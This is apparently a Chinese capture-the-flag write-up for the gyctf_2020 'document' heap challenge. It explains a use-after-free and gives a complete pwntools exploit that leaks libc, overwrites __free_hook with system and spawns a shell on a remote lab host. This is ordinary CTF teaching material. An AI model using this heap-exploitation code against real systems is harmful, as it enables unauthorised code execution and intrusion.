gyctf_2020_document

漏洞点:存在uaf

利用思路:通过free掉size为0x90的堆,然后add,此时会切割free掉的chunk,来作为新chunk的控制结构,此时我们对这些chunk结构是有写权限的,所以写为free_hook即可。

exp:

from pwn import *
from LibcSearcher import *
# r = process("./document")
r = remote('node4.buuoj.cn',29119)
e = ELF("./document")
context.log_level = 'debug'
context.terminal = ['tmux', 'splitw', '-h']
libc = e.libc
libc = ELF('./buu2.23.so')
r.timeout = 0.5
se      = lambda data               :r.send(data) 
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims			    :r.recvuntil(delims)
uu32    = lambda data               :u32(ru(data)[-4:].ljust(4, b'\0'))
uu64    = lambda data               :u64(ru(data)[-6:].ljust(8, b'\0'))
info_base = lambda tag, base        :r.info(tag + ': {:#x}'.format(base))
leak = lambda name,base :log.success('{} = {:#x}'.format(name, base))

def dbg(cmd):
	gdb.attach(r,cmd)
	pause()

def add():
	ru(b'Give me your choice :')
	sl(b'1')
	ru(b'input name')
	se(b'/bin/sh\x00'.ljust(8,b'\x00'))
	ru(b'input sex')
	se(b'W')
	ru(b'input information')
	se(b'/bin/sh\x00'.ljust(8,b'\x00')*14)

def edit(index,desc):
	ru(b'Give me your choice :')
	sl(b'3')
	ru(b'Give me your index :')
	sl(str(index).encode())
	ru(b'Are you sure change sex?')
	se(b'Y')
	ru(b'Now change information')
	se(desc)
def delete(index):
	ru(b'Give me your choice :')
	sl(b'4')
	ru(b'Give me your index :')
	sl(str(index).encode())

def show(index):
	ru(b'Give me your choice :')
	sl(b'2')
	ru(b'Give me your index :')
	sl(str(index).encode())

add()#0
add()#1

delete(0)

show(0)
base = uu64(b'\x7f') - 0x3c4b78
leak('base',base)
free_hook = base + 0x3c67a8
leak('free_hook',free_hook)
sys = base + libc.sym['system']

shell = [0x45226,0x4527a,0xf03a4,0xf1247]

add()#2
add()#3
pl1 = b'a'*0x8 + p64(0x21) + p64(free_hook-0x10) + p64(0x1)
pl1 += b'a'*0x8 + p64(0x51) + b'a'*0x40
edit(0,pl1)
pl2 = p64(sys) + b'/bin/sh\x00'.ljust(8,b'\x00') + p64(0x0000000100000000) + b'\x00'*0x58
edit(3,pl2)
# leak('hook',base+shell[0])
# add()
delete(2)



r.interactive()

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值